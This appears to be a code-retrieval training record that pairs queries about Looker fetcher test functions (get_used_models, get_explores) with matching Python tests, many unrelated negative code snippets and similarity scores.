[ "0.75194955", "0.7327567", "0.69435924", "0.67743224", "0.67731684", "0.66390353", "0.6595562", "0.6590047", "0.64084816", "0.6316313", "0.6267025", "0.62651926", "0.626041", "0.6233475", "0.6200443", "0.61957514", "0.61935633", "0.61921066", "0.61672646", "0.61589247", "0.6154951", "0.6127301", "0.6122401", "0.6119595", "0.60895294", "0.6084304", "0.6076584", "0.60558337", "0.60204977", "0.60099065", "0.6000378", "0.59894866", "0.5973256", "0.59708786", "0.59646904", "0.5959054", "0.59453535", "0.5932688", "0.59304863", "0.5917831", "0.59142953", "0.5913386", "0.59090734", "0.5888891", "0.58860165", "0.58712643", "0.58348227", "0.5808802", "0.5807494", "0.5796432", "0.5787363", "0.5786724", "0.5774374", "0.5767773", "0.5763746", "0.5724312", "0.5718138", "0.57111436", "0.57084054", "0.5691953", "0.5680172", "0.5664144", "0.56401724", "0.56401724", "0.5574124", "0.5539155", "0.5536057", "0.5520777", "0.5517591", "0.550578", "0.5502662", "0.5495101", "0.5493489", "0.5487742", "0.54824877", "0.54764974", "0.54740924", "0.54740924", "0.54664975", "0.54634917", "0.5454626", "0.5453488", "0.54526365", "0.5449064", "0.5448379", "0.544452", "0.543344", "0.54320335", "0.5430745", "0.54078996", "0.5407478", "0.5388507", "0.5386578", "0.5386476", "0.5382068", "0.5374689", "0.5372811", "0.53641796", "0.5361513", "0.5361345" ]
0.666128
5
fetcher.get_used_models() should return models that have queries against them.
def test_get_used_models(fc: fetcher.Fetcher, test_model):
    used_models = fc.get_used_models()
    assert isinstance(used_models, dict)
    assert len(used_models) > 0
    assert all(type(model_name) == str for model_name in used_models.keys())
    assert all(type(query_count) == int for query_count in used_models.values())
    assert test_model["name"] in used_models.keys()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def availablemodels(self):\n return self.__models.keys()", "def _get_models(self, req, is_detail):\n context = req.environ['meteos.context']\n\n search_opts = {}\n search_opts.update(req.GET)\n\n # Remove keys that are not related to model attrs\n search_opts.pop('limit', None)\n search_opts.pop('offset', None)\n sort_key = search_opts.pop('sort_key', 'created_at')\n sort_dir = search_opts.pop('sort_dir', 'desc')\n\n models = self.engine_api.get_all_models(\n context, search_opts=search_opts, sort_key=sort_key,\n sort_dir=sort_dir)\n\n limited_list = common.limited(models, req)\n\n if is_detail:\n models = self._view_builder.detail_list(req, limited_list)\n else:\n models = self._view_builder.summary_list(req, limited_list)\n return models", "def get_available_models():\n modelpath = os.path.join(os.path.dirname(__file__), \"train\", \"model\")\n models = sorted(item.name.replace(\".py\", \"\").replace(\"_\", \"-\")\n for item in os.scandir(modelpath)\n if not item.name.startswith(\"_\")\n and item.name.endswith(\".py\"))\n return models", "def get_models(self):\n self.load()\n return self._models", "def fetch_models(self):\n if self.model_pool is None:\n print(\"Please train a model first.\", file=STDE)\n EXIT(1)\n else:\n return [copy.deepcopy(m.steps[-1][-1]) for m in self.model_pool]", "def get_installed_models():\n global _installed_models_cache\n if _installed_models_cache is not None:\n return _installed_models_cache\n _installed_models_cache = []\n for a in settings.INSTALLED_APPS:\n try:\n _installed_models_cache.append(__import__(a + '.models', '', '', ['']))\n except ImportError:\n pass\n return _installed_models_cache", "def get_available_entities_models():\n return ['concat', 'bahdanau', 'luong']", "def get_models_query():\n query = db.session.query(Products.model).distinct()\n return query", "def get_models(self, app_name):\n try:\n models = list(apps.get_app_config(app_name).get_models())\n return models\n except:\n raise LookupError(f\"this is no such app {app_name}\")", "def test_coupledmodels_get(self):\n pass", "def test_get_models_returns_models(fc: fetcher.Fetcher):\n ml = fc.get_models()\n assert isinstance(ml, list)\n assert isinstance(ml[0], models.LookmlModel)", "def get_best_models(self, num_models) -> Sequence[tf.keras.Model]:\n pass", "def GetModels(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def models(self):\n return self.config.models()", "def pending_models(self):\n return self._pending_models", "def requires_model_loading(self):\n return self.requires_loaded_models", "def list_available_models(cls) -> 'List[PretrainedModelInfo]':\n list_of_models = []\n for subclass in cls.__subclasses__():\n subclass_models = subclass.list_available_models()\n if subclass_models is not None and len(subclass_models) > 0:\n list_of_models.extend(subclass_models)\n return list_of_models", "def list_available_models(cls) -> 'List[PretrainedModelInfo]':\n list_of_models = []\n for subclass in cls.__subclasses__():\n subclass_models = subclass.list_available_models()\n if subclass_models is not None and len(subclass_models) > 0:\n list_of_models.extend(subclass_models)\n return list_of_models", "def list_available_models(cls) -> 'List[PretrainedModelInfo]':\n list_of_models = []\n for subclass in cls.__subclasses__():\n subclass_models = subclass.list_available_models()\n if subclass_models is not None and len(subclass_models) > 0:\n list_of_models.extend(subclass_models)\n return list_of_models", "def list_available_models(cls) -> 
'List[PretrainedModelInfo]':\n list_of_models = []\n for subclass in cls.__subclasses__():\n subclass_models = subclass.list_available_models()\n if subclass_models is not None and len(subclass_models) > 0:\n list_of_models.extend(subclass_models)\n return list_of_models", "def opt_get_all_models_rest_api():\n return retrieve_all_models()", "def list_available_models(cls) -> 'List[PretrainedModelInfo]':\n # recursively walk the subclasses to generate pretrained model info\n list_of_models = model_utils.resolve_subclass_pretrained_model_info(cls)\n return list_of_models", "def list_models():\n\tclsmembers = inspect.getmembers(sys.modules[__name__], inspect.isclass)\n\tverif = lambda cls: 'Verified: {0}'.format(cls[1]().verified)\n\tfit_models = [ (cls[0], verif(cls)) for cls in clsmembers if cls[1].__bases__[0] == core.FitModel ]\n\treturn fit_models", "def get_live_tracked_models(self, model_class):\n return self.update_models[model_class] + self.create_models[model_class]", "def get_models():\n\n from lmfit.models import lmfit_models\n models = lmfit_models\n if 'Expression' in models:\n del models['Expression']\n if 'Gaussian-2D' in models:\n del models['Gaussian-2D']\n\n filenames = set()\n\n models_path = pkg_resources.resource_filename('nexpy.api.frills',\n 'models')\n sys.path.append(models_path)\n for file_ in os.listdir(models_path):\n name, ext = os.path.splitext(file_)\n if name != '__init__' and ext.startswith('.py'):\n filenames.add(name)\n\n private_path = os.path.join(os.path.expanduser('~'), '.nexpy', 'models')\n if os.path.isdir(private_path):\n sys.path.append(private_path)\n for file_ in os.listdir(private_path):\n name, ext = os.path.splitext(file_)\n if name != '__init__' and ext.startswith('.py'):\n filenames.add(name)\n\n for name in sorted(filenames):\n try:\n module = importlib.import_module(name)\n models.update(dict((n.strip('Model'), m)\n for n, m in inspect.getmembers(module,\n inspect.isclass)\n if issubclass(m, Model) and n != 'Model'))\n except ImportError:\n pass\n\n return models", "def get_supported_models(self):\n # type: () -> list\n return [model for model in self.__MODELS]", "def models(self):\n return self._base.classes", "def models() -> list[str]:\n return list(models_url.keys())", "def models(self, model=None):\n for query in self.__queries:\n if isinstance(query, orb.Query):\n yield query.model(model)\n else:\n for model in query.models(model):\n yield model", "def peak_all_models(self) -> List:\n models = list(self.meta.name)\n print(models)\n return models", "def models(self):\r\n return self.get_field('model')", "def models(self):\r\n return self.get_field('model')", "def load_all_queryset(self):\n return self.get_model()._default_manager.all()", "def test_get_models_filters(fc: fetcher.Fetcher, test_project_name, test_model):\n ml = fc.get_models(project=test_project_name)\n assert all(m.project_name == test_project_name for m in ml)\n\n ml = fc.get_models(model=test_model[\"name\"])\n assert all(m.name == test_model[\"name\"] for m in ml)\n\n ml = fc.get_models(project=test_project_name, model=test_model[\"name\"])\n assert all(\n m.project_name == test_project_name and m.name == test_model[\"name\"] for m in ml\n )", "def load_models():\n vectorizer = ModelStorage.objects.all().values_list(\"vectorizer\", flat = True)[0]\n classifier = ModelStorage.objects.all().values_list(\"classifier\", flat = True)[0]\n\n return vectorizer, classifier", "def test_get_used_explores(fc: fetcher.Fetcher, test_model, test_used_explore_names):\n used_explores 
= fc.get_used_explores(model=test_model[\"name\"])\n assert isinstance(used_explores, dict)\n assert all(e in test_used_explore_names for e in used_explores)", "def get_models(self):\n return self.P, self.Q", "def usage_for_model(self, model, counts=False, min_count=None, filters=None, extra=None):\n if extra is None: extra = {}\n if filters is None: filters = {}\n\n if not parse_lookup:\n # post-queryset-refactor (hand off to usage_for_queryset)\n queryset = model._default_manager.filter()\n for f in filters.items():\n queryset.query.add_filter(f)\n usage = self.usage_for_queryset(queryset, counts, min_count, extra)\n else:\n # pre-queryset-refactor\n extra_joins = ''\n extra_criteria = ''\n params = []\n if len(filters) > 0:\n joins, where, params = parse_lookup(filters.items(), model._meta)\n extra_joins = ' '.join(['%s %s AS %s ON %s' % (join_type, table, alias, condition)\n for (alias, (table, join_type, condition)) in joins.items()])\n extra_criteria = 'AND %s' % (' AND '.join(where))\n usage = self._get_usage(model, counts, min_count, extra_joins, extra_criteria, params, extra)\n\n return usage", "def list_models(self, fields=['model_name']):\n\t\tmodels = dbop.get_models(self, model_type='all', fields=fields)\n\t\treturn models", "def get_models():\n all_models = gfile.Glob(os.path.join(MODELS_DIR, '*.meta'))\n model_filenames = [os.path.basename(m) for m in all_models]\n model_numbers_names = sorted([\n (shipname.detect_model_num(m), shipname.detect_model_name(m))\n for m in model_filenames])\n return model_numbers_names", "def _get_includes(self):\n models = []\n op, targets = self.get_data()\n if op == self.OPERATOR.NOT:\n return models\n\n for t in targets:\n if isinstance(t, ObjectModel):\n models += [t]\n elif isinstance(t, TargetingCriterion):\n if op != self.OPERATOR.NOT:\n models += t._get_includes()\n\n return models", "def count_models(self):\n return len(self.model_list)", "def manager(model):\n return model.objects", "def enabled_models(with_common=True):\n return targeted.enabled_models(with_common) + untargeted.enabled_models(with_common)", "def ListModels(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def iter_models(self):\n return iter(self.model_list)", "def get_models():\n param = {'C': 0.7678243129497218, 'penalty': 'l2'}\n model1 = LogisticRegression(**param)\n\n param = {'n_neighbors': 8}\n model2 = KNeighborsClassifier(**param)\n\n param = {'C': 1.7, 'kernel': 'linear', 'probability':True}\n model3 = SVC(**param)\n\n param = {'criterion': 'gini', 'max_depth': 3, 'max_features': 2, 'min_samples_leaf': 3}\n model4 = DecisionTreeClassifier(**param)\n\n param = {'learning_rate': 0.05, 'n_estimators': 150}\n model5 = AdaBoostClassifier(**param)\n\n param = {'learning_rate': 0.01, 'n_estimators': 100}\n model6 = GradientBoostingClassifier(**param)\n\n model7 = RandomForestClassifier()\n\n model8 = ExtraTreesClassifier()\n\n models = {'LR':model1, 'KNN':model2, 'SVC':model3, 'DT':model4,\n 'ADa':model5, 'GB':model6, 'RF':model7, 'ET':model8\n }\n return models", "def _get_usage(self, model, counts=False, min_count=None, extra_joins=None, extra_criteria=None, params=None, extra=None):\n if min_count is not None: counts = True\n\n model_table = qn(model._meta.db_table)\n model_pk = '%s.%s' % (model_table, qn(model._meta.pk.column))\n tag_columns = self._get_tag_columns()\n \n if extra is None: extra = {}\n extra_where = ''\n if 'where' in extra:\n extra_where = 'AND ' + ' AND '.join(extra['where'])\n \n query = \"\"\"\n SELECT 
DISTINCT %(tag_columns)s%(count_sql)s\n FROM\n %(tag)s\n INNER JOIN %(tagged_item)s\n ON %(tag)s.id = %(tagged_item)s.tag_id\n INNER JOIN %(model)s\n ON %(tagged_item)s.object_id = %(model_pk)s\n %%s\n WHERE %(tagged_item)s.content_type_id = %(content_type_id)s\n %%s\n %(extra_where)s\n GROUP BY %(tag)s.id, %(tag)s.name\n %%s\n ORDER BY %(tag)s.%(ordering)s ASC\"\"\" % {\n 'tag': qn(self.model._meta.db_table),\n 'ordering': ', '.join(qn(field) for field in self.model._meta.ordering),\n 'tag_columns': tag_columns,\n 'count_sql': counts and (', COUNT(%s)' % model_pk) or '',\n 'tagged_item': qn(self.intermediary_table_model._meta.db_table),\n 'model': model_table,\n 'model_pk': model_pk,\n 'extra_where': extra_where,\n 'content_type_id': ContentType.objects.get_for_model(model).pk,\n }\n\n min_count_sql = ''\n if min_count is not None:\n min_count_sql = 'HAVING COUNT(%s) >= %%s' % model_pk\n params.append(min_count)\n\n cursor = connection.cursor()\n cursor.execute(query % (extra_joins, extra_criteria, min_count_sql), params)\n tags = []\n for row in cursor.fetchall():\n t = self.model(*row[:len(self.model._meta.fields)])\n if counts:\n t.count = row[len(self.model._meta.fields)]\n tags.append(t)\n return tags", "def _get_usage(self, model, counts=False, min_count=None, extra_joins=None, extra_criteria=None, params=None):\r\n if min_count is not None: counts = True\r\n\r\n model_table = qn(model._meta.db_table)\r\n model_pk = '%s.%s' % (model_table, qn(model._meta.pk.column))\r\n query = \"\"\"\r\n SELECT DISTINCT %(tag)s.id, %(tag)s.name%(count_sql)s\r\n FROM\r\n %(tag)s\r\n INNER JOIN %(tagged_item)s\r\n ON %(tag)s.id = %(tagged_item)s.tag_id\r\n INNER JOIN %(model)s\r\n ON %(tagged_item)s.object_id = %(model_pk)s\r\n %%s\r\n WHERE %(tagged_item)s.content_type_id = %(content_type_id)s\r\n %%s\r\n GROUP BY %(tag)s.id, %(tag)s.name\r\n %%s\r\n ORDER BY %(tag)s.name ASC\"\"\" % {\r\n 'tag': qn(self.model._meta.db_table),\r\n 'count_sql': counts and (', COUNT(%s)' % model_pk) or '',\r\n 'tagged_item': qn(TaggedItem._meta.db_table),\r\n 'model': model_table,\r\n 'model_pk': model_pk,\r\n 'content_type_id': ContentType.objects.get_for_model(model).pk,\r\n }\r\n\r\n min_count_sql = ''\r\n if min_count is not None:\r\n min_count_sql = 'HAVING COUNT(%s) >= %%s' % model_pk\r\n params.append(min_count)\r\n\r\n cursor = connection.cursor()\r\n cursor.execute(query % (extra_joins, extra_criteria, min_count_sql), params)\r\n tags = []\r\n for row in cursor.fetchall():\r\n t = self.model(*row[:2])\r\n if counts:\r\n t.count = row[2]\r\n tags.append(t)\r\n return tags", "def GetModels(self, request, timeout, metadata=None, with_call=False, protocol_options=None):\n raise NotImplementedError()", "def get_object_models(self):\n parser = WorldParser(self.world_fpath)\n return parser.models", "def usage_for_model(self, model, counts=False, min_count=None, filters=None):\r\n if filters is None: filters = {}\r\n\r\n if not parse_lookup:\r\n # post-queryset-refactor (hand off to usage_for_queryset)\r\n queryset = model._default_manager.filter()\r\n for f in filters.items():\r\n queryset.query.add_filter(f)\r\n usage = self.usage_for_queryset(queryset, counts, min_count)\r\n else:\r\n # pre-queryset-refactor\r\n extra_joins = ''\r\n extra_criteria = ''\r\n params = []\r\n if len(filters) > 0:\r\n joins, where, params = parse_lookup(filters.items(), model._meta)\r\n extra_joins = ' '.join(['%s %s AS %s ON %s' % (join_type, table, alias, condition)\r\n for (alias, (table, join_type, condition)) in 
joins.items()])\r\n extra_criteria = 'AND %s' % (' AND '.join(where))\r\n usage = self._get_usage(model, counts, min_count, extra_joins, extra_criteria, params)\r\n\r\n return usage", "def get_models(automaker, year):\n return set([row[\"model\"] for row in data\n if row[\"automaker\"] == automaker and\n row[\"year\"] == year])", "def load_models(model_name=\"\", path=\"\", read_grains=False, **kwargs):\n models = pc.load_models('{0}{1}'.format(path, model_name), read_grains=read_grains, **kwargs)\n models_return = []\n for m in models:\n if m.n_zones > 1:\n models_return.append(m)\n else:\n # log failed model\n pass\n return models_return", "def models(self):\n \n # Call the Razor RESTful API to get a list of models\n headers = {'content-type': 'application/json'}\n r = requests.get(self.url + '/model', headers=headers)\n\n # Check the status code and return appropriately\n if r.status_code == 200:\n return json.loads(r.content)\n else:\n return 'Error in request, exited with status code:' + str(r.status_code)", "def test_downloadAllModels(self):\n\t\tmodelOptions = cancerscope.config.getmodelsdict() ## MODIFIED FROM cancerscope.getmodelsdict() on March 17 2020\n\t\tassert len(modelOptions.keys()) == 5\n\t\tscope_ensemble_obj = cancerscope.scope_ensemble.scope() ## MODIFIED FROM cancerscope.scope() on March 17 2020\n\t\t#my_downloaded_models = cancerscope.get_models.getmodel() ## This should retrieve all models\n\t\tmy_downloaded_models = scope_ensemble_obj.downloaded_models_dict\n\t\tassert len(my_downloaded_models.keys()) == 5\n\t\tfor k_model in my_downloaded_models.keys():\n\t\t\tmodelname_address = my_downloaded_models[k_model]\n\t\t\t\"\"\"For each model, test if model dir exists, then set up the model once\"\"\"\n\t\t\tself.assertTrue(os.path.isdir(modelname_address))\n\t\t\tself.assertTrue(os.path.exists(\"\".join([modelname_address, \"/lasagne_bestparams.npz\"])))\n\t\t\t\"\"\"TO BE FIXED: THEN SET UP MODEL (memory issues in travis (3 GB RAM there)\"\"\"\n\t\t\t#lmodel = cancerscope.scopemodel(modelname_address_pair[k_model])\n\t\t\t#lmodel.fit()\n\t\t\t#self.assertEqual(len(lmodel.features), 17688)\n\t\t\t#del lmodel; lmodel=None\n\t\t\t#for i in range(3):\n\t\t\t#\tgc.collect()", "def get_models(self, model_names, callback):\n models = self.get_collection('_model')\n models.find(spec={'_id': {'$in': tuple(model_names)}}).to_list(\n callback=callback)", "def get_related_models(self):\n\t\tmodels = []\n\t\tif not self.related_models:\n\t\t\treturn models\n\n\t\tfor model in self.related_overrides.get(self.related_override_key(), self.related_models):\n\t\t\ttry:\n\t\t\t\tgroup, model_path, extra_fields = model\n\t\t\texcept ValueError:\n\t\t\t\tgroup, model_path = model\n\t\t\t\textra_fields = ()\n\t\t\tapp_label, model_name = model_path.split('.')\n\t\t\tmodels.append((group, apps.get_model(app_label, model_name,), extra_fields, group.replace('_', ' ')))\n\n\t\treturn models", "def supported_models(cls):\n \n models = []\n \n for subclass in cls.__subclasses__():\n models+=subclass.supported_models()\n return models", "def models():\n return list(alg2module.keys())", "def get_available_layers(self, path):\n\n now = datetime.now()\n for model in self.models:\n query = model.objects\n query = query.filter(\n Q(available_start__isnull=True) | Q(available_start__lte=now))\n query = query.filter(\n Q(available_stop__isnull=True) | Q(available_stop__gte=now))\n\n # This bit is a little crazy. 
We can't use\n # query.filter(field__like=value) because we\n # need to use the value of the field (the regex)\n # as the expression on the query. Instead, we\n # lookup the regex operator for the database connection\n # that the query is using, jigger it a bit, and use\n # it for a manual 'where' clause. This has been tested\n # with postgresql and sqlite. YMMV.\n op = connections[query.db].operators['regex']\n op = op.replace('%s', '').strip()\n query = query.extra(\n where=['%s ' + op + ' path_rx'], params=[path])\n\n for layer in query.order_by('order'):\n yield layer", "def total_models_produced(self):\n return self._total_models_produced", "def test_get_models(self):\n models = get_models()\n self.assertTrue(len(models) > 6)\n self.assertIn((\"csvimport.Item\", \"csvimport.Item\"), models)", "def load_models(self, models, iteration = None):\n print(\"NOT IMPLEMENTED YET\")", "def get_models(automaker, year):\n\n return set([car['model'] for car in data if car['automaker'] == automaker and car['year'] == year])", "def find_syncable_models(self):\n return [Customer]", "def list_supported_models() -> Sequence[str]:\r\n return list(_MODELS)", "def get_queryset(self):\n if getattr(self, 'use_this_queryset', None):\n return self.use_this_queryset\n return self.model().objects.all()", "def get_global_version_managers(_cls=True):\n queryset = TemplateVersionManager.objects.filter(user=None).all()\n if _cls:\n queryset = queryset.filter(\n _cls=TemplateVersionManager._class_name\n ).all()\n return queryset", "def models(self):\n models = []\n for bundle in self.bundles.values():\n models.extend(list(bundle.models.values()))\n\n return models", "def list_models(SortBy=None, SortOrder=None, NextToken=None, MaxResults=None, NameContains=None, CreationTimeBefore=None, CreationTimeAfter=None):\n pass", "def get_queryset(self):\n return self.model.objects.all()", "def test_get_model_names():\n\n names = Instafilter.get_models()\n assert isinstance(names, list)\n assert len(names) > 1", "def index(self, req):\n return self._get_models(req, is_detail=False)", "def get_queryset(self):\r\n return self.model.objects.all()", "def models(self) -> list[AbstractModel]:\n return self._models", "def get_installed_model_modules(core_models=None):\n global _installed_modules_cache\n if _installed_modules_cache is not None:\n return _installed_modules_cache\n _installed_modules_cache = []\n\n # django.models is a special case.\n for submodule in (core_models or []):\n _installed_modules_cache.append(__import__('django.models.%s' % submodule, '', '', ['']))\n for m in get_installed_models():\n for submodule in getattr(m, '__all__', []):\n mod = __import__('django.models.%s' % submodule, '', '', [''])\n try:\n mod._MODELS\n except AttributeError:\n pass # Skip model modules that don't actually have models in them.\n else:\n _installed_modules_cache.append(mod)\n return _installed_modules_cache", "def get_model_specs(self):\n raise NotImplementedError()", "def findModels(self, Met=None, Y=None, Lmix=None, Mass=None):\n result = []\n for m in self._models:\n if Met is not None:\n if Met != m[0]:\n continue\n if Y is not None:\n if Y != m[1]:\n continue\n if Lmix is not None:\n if Lmix != m[2]:\n continue\n if Mass is not None:\n if Mass != m[3]:\n continue\n result.append(m)\n return result", "def index_queryset(self, using=None):\n return self.get_model().objects.all()", "def index_queryset(self, using=None):\n return self.get_model().objects.all()", "def index_queryset(self, using=None):\n return 
self.get_model().objects.all()", "def index_queryset(self, using=None):\n return self.get_model().objects.all()", "def index_queryset(self, using=None):\n return self.get_model().objects.all()", "def index_queryset(self, using=None):\n return self.get_model().objects.all()", "def index_queryset(self, using=None):\n return self.get_model().objects.all()", "def index_queryset(self, using=None):\n return self.get_model().objects.all()", "def index_queryset(self, using=None):\n return self.get_model().objects.all()", "def index_queryset(self, using=None):\n return self.get_model().objects.all()", "def index_queryset(self, using=None):\n return self.get_model().objects.all()", "def test_list_models():\n model_names = find_model_files()\n listed_model_names = list_available_nagl_models()\n assert listed_model_names == model_names", "def get_related_models(self, model):\n return self._invalidation_model_store.get(model, {})", "def get_seo_models():\n seo_models = []\n for model_name in getattr(settings, setting_name_seo_models, ()):\n if \".\" in model_name:\n # TODO: Test this block\n app_label, model_name = model_name.split(\".\", 1)\n model = models.get_model(app_label, model_name)\n if model:\n seo_models.append(model)\n else:\n app = models.get_app(model_name)\n if app:\n seo_models.extend(models.get_models(app))\n\n return seo_models", "def _retrieve_models(local=True):\n # Check if the download folder exists\n def _get_meta_data(model_name, file):\n return {\n \"data\": {\n \"id\": model_name,\n \"name\": model_name,\n \"description\": model_name,\n \"filename\": os.path.join(\n app.config[\"DOWNLOAD_DIR\"], file),\n \"created\": time.ctime(os.path.getctime(\n os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n file))),\n \"modified\": time.ctime(os.path.getmtime(\n os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n file)))\n }\n }\n\n if not os.path.exists(app.config[\"DOWNLOAD_DIR\"]):\n os.makedirs(app.config[\"DOWNLOAD_DIR\"])\n\n if not local:\n # Fetch from a Nexus-hosted catalog\n resources = app.forge.search({\"type\": \"EmbeddingModel\"})\n for resource in resources:\n app.models[resource.name] = {\n \"data\": digest_model_data(resource),\n }\n app.forge.download(\n resource, \"distribution.contentUrl\",\n app.config[\"DOWNLOAD_DIR\"])\n\n pipeline_path = os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n resource.distribution.name)\n app.models[resource.name][\"object\"] = EmbeddingPipeline.load(\n pipeline_path,\n embedder_interface=GraphElementEmbedder,\n embedder_ext=\"zip\")\n\n # Clear the downloads dir\n for f in os.listdir(app.config[\"DOWNLOAD_DIR\"]):\n try:\n os.remove(os.path.join(app.config[\"DOWNLOAD_DIR\"], f))\n except Exception:\n shutil.rmtree(os.path.join(app.config[\"DOWNLOAD_DIR\"], f))\n else:\n # Fetch from a local dir\n for (_, dirs, files) in os.walk(app.config[\"DOWNLOAD_DIR\"]):\n for path in dirs + files:\n if path[0] != \".\":\n match = re.match(r\"(.*)\\.zip\", path)\n if match:\n model_name = match.groups()[0]\n else:\n model_name = path\n app.models[model_name] = _get_meta_data(model_name, path)\n pipeline_path = os.path.join(\n app.config[\"DOWNLOAD_DIR\"], path)\n app.models[model_name][\"object\"] = EmbeddingPipeline.load(\n pipeline_path,\n embedder_interface=GraphElementEmbedder,\n embedder_ext=\"zip\")\n break", "def get_model_list():\n with open(os.path.join(MODELS_FOLDER, \"models.json\"), \"r\") as model_file:\n model_list = json.load(model_file)\n return model_list", "def import_data(self):\n self.models = []\n for o in self.loader.load():\n klass = 
self.type_for(o)\n if hasattr(klass, \"from_api\"):\n self.models.append(klass.from_api(o))\n else:\n self.models.append(klass(o))\n return self.models", "def get_models_for_make(self, make):\n return self.get('vehicles/GetModelsForMake/{}'.format(make))", "def queryset(cls):\n return cls.model._default_manager.all()", "def get_queryset(self):\n if hasattr(self, 'revision_model'):\n return self.revision_model.objects\n raise NotImplementedError()", "def ListModels(self, request, timeout, metadata=None, with_call=False, protocol_options=None):\n raise NotImplementedError()" ]
[ "0.70178705", "0.66382486", "0.6534866", "0.631813", "0.63044095", "0.6285215", "0.61792207", "0.6041896", "0.60361505", "0.6007675", "0.592958", "0.5920479", "0.58479476", "0.5833444", "0.58288264", "0.5817674", "0.58034897", "0.58034897", "0.58034897", "0.58034897", "0.57479924", "0.5734192", "0.5726884", "0.57234335", "0.57156134", "0.5707454", "0.56922764", "0.5678311", "0.5645432", "0.56387645", "0.56209177", "0.56209177", "0.5562725", "0.55562156", "0.555299", "0.55489856", "0.55474484", "0.5507781", "0.54999256", "0.5487013", "0.54782516", "0.5454184", "0.5442128", "0.5439733", "0.5431467", "0.54312044", "0.542052", "0.54084516", "0.5407803", "0.5405204", "0.5393154", "0.53917795", "0.53837395", "0.53772527", "0.5363033", "0.53603226", "0.5354359", "0.5344046", "0.5337248", "0.5333164", "0.5326466", "0.53238297", "0.53189045", "0.53127223", "0.53078544", "0.53074086", "0.5306363", "0.53058285", "0.53045046", "0.5304504", "0.53023344", "0.52706414", "0.5239227", "0.5208246", "0.5206105", "0.5205467", "0.51972127", "0.51908356", "0.5188978", "0.5188504", "0.5188504", "0.5188504", "0.5188504", "0.5188504", "0.5188504", "0.5188504", "0.5188504", "0.5188504", "0.5188504", "0.5188504", "0.51801306", "0.51797336", "0.5155044", "0.5147231", "0.51456827", "0.5145405", "0.5145347", "0.5135066", "0.51331466", "0.5132615" ]
0.7987806
0
fetcher.get_explores() should return a list of explores.
def test_get_explores(fc: fetcher.Fetcher):
    explores = fc.get_explores()
    assert isinstance(explores, list)
    assert len(explores) > 0
    assert isinstance(explores[0], models.LookmlModelExplore)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_get_explores_filters(fc: fetcher.Fetcher):\n explores = fc.get_explores(model=\"henry_dusty\")\n assert all(e.model_name == \"henry_dusty\" for e in explores)\n\n explores = fc.get_explores(model=\"henry_qa\", explore=\"explore_2_joins_all_used\")\n assert all(\n e.model_name == \"henry_qa\" and e.name == \"explore_2_joins_all_used\"\n for e in explores\n )", "def test_get_unused_explores(fc: fetcher.Fetcher, test_model, test_unused_explores):\n unused_explores = fc.get_unused_explores(model=test_model[\"name\"])\n assert all(e in test_unused_explores for e in unused_explores)", "def get_expenses(self, parameter=None):\n resp = zoho_http_client.get(base_url, self.details, self.headers, parameter)\n return parser.get_list(resp)", "def test_get_used_explores(fc: fetcher.Fetcher, test_model, test_used_explore_names):\n used_explores = fc.get_used_explores(model=test_model[\"name\"])\n assert isinstance(used_explores, dict)\n assert all(e in test_used_explore_names for e in used_explores)", "def explores(self, explores):\n\n self._explores = explores", "def get_list(self, resp):\n expenses = resp['expenses']\n expense_list = ExpenseList()\n for value in expenses:\n expense = Expense()\n expense.set_expense_id(value['expense_id'])\n expense.set_date(value['date'])\n expense.set_account_name(value['account_name'])\n expense.set_paid_through_account_name(value[\\\n 'paid_through_account_name'])\n expense.set_description(value['description'])\n expense.set_currency_id(value['currency_id'])\n expense.set_currency_code(value['currency_code'])\n expense.set_bcy_total(value['bcy_total'])\n expense.set_total(value['total'])\n expense.set_is_billable(value['is_billable'])\n expense.set_reference_number(value['reference_number'])\n expense.set_customer_id(value['customer_id'])\n expense.set_customer_name(value['customer_name'])\n expense.set_vendor_id(value['vendor_id'])\n expense.set_vendor_name(value['vendor_name'])\n expense.set_status(value['status'])\n expense.set_created_time(value['created_time'])\n expense.set_expense_receipt_name(value['expense_receipt_name'])\n expense_list.set_expenses(expense)\n page_context_obj = PageContext()\n page_context = resp['page_context']\n page_context_obj.set_page(page_context['page'])\n page_context_obj.set_per_page(page_context['per_page'])\n page_context_obj.set_has_more_page(page_context['has_more_page'])\n page_context_obj.set_report_name(page_context['report_name'])\n page_context_obj.set_applied_filter(page_context['applied_filter'])\n page_context_obj.set_sort_column(page_context['sort_column'])\n page_context_obj.set_sort_order(page_context['sort_order'])\n expense_list.set_page_context(page_context)\n\n return expense_list", "def exploits(self):\n return self.rpc.call(MsfRpcMethod.ModuleExploits)['modules']", "def get_exploits():\n results = {}\n for loader, name, ispkg in pkgutil.walk_packages(acsploit.exploits.__path__):\n m = loader.find_module(name).load_module(name)\n\n if not ispkg and hasattr(m, 'options') and hasattr(m, 'run'):\n exploit = name.replace('.', '/')\n results[exploit] = m\n\n return results", "def test_get_explore_fields_gets_fields_for_dimension_or_measure_only_explores(\n fc: fetcher.Fetcher, test_model, test_dimensions_or_measures_only_explores\n):\n expected = test_dimensions_or_measures_only_explores[0]\n explore = fc.get_explores(model=test_model[\"name\"], explore=expected[\"name\"])\n assert isinstance(explore, list)\n actual = explore[0]\n assert actual.name == expected[\"name\"]\n assert not 
(actual.fields.dimensions and actual.fields.measures)\n expected_fields = [f[\"name\"] for f in expected[\"fields\"]]\n actual_fields = fc.get_explore_fields(actual)\n assert actual_fields == expected_fields", "def _get_exchanges(token: str) -> List[mtypes.Exchange]:\n _LOG.info(\"Getting exchanges from API ...\")\n response = get_client().service.ExchangeList(Token=token)\n\n exchanges = [\n mtypes.Exchange.from_dict(d=obj)\n for obj in zeep.helpers.serialize_object(response.EXCHANGES[\"EXCHANGE\"])\n ]\n _LOG.info(\"Got %s exchanges\", len(exchanges))\n return exchanges", "def get_option_expirations(symbol: str, source: str = \"Nasdaq\") -> list:\n source = re.sub(r\"\\s+\", \"\", source.lower())\n output = []\n if source == \"tradier\":\n output = tradier_model.option_expirations(symbol)\n if source == \"yahoofinance\":\n output = yfinance_model.option_expirations(symbol)\n if source == \"nasdaq\":\n output = nasdaq_model.option_expirations(symbol)\n if source == \"intrinio\":\n output = intrinio_model.get_expiration_dates(symbol)\n\n if not output:\n 